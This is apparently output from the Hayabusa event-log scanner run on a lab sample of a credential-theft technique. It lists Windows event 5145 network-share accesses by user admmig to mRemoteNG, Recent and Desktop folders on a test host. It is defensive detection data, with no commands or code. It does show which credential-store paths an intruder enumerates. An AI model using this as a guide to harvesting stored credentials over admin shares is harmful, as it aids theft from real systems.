0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.505 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.523 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
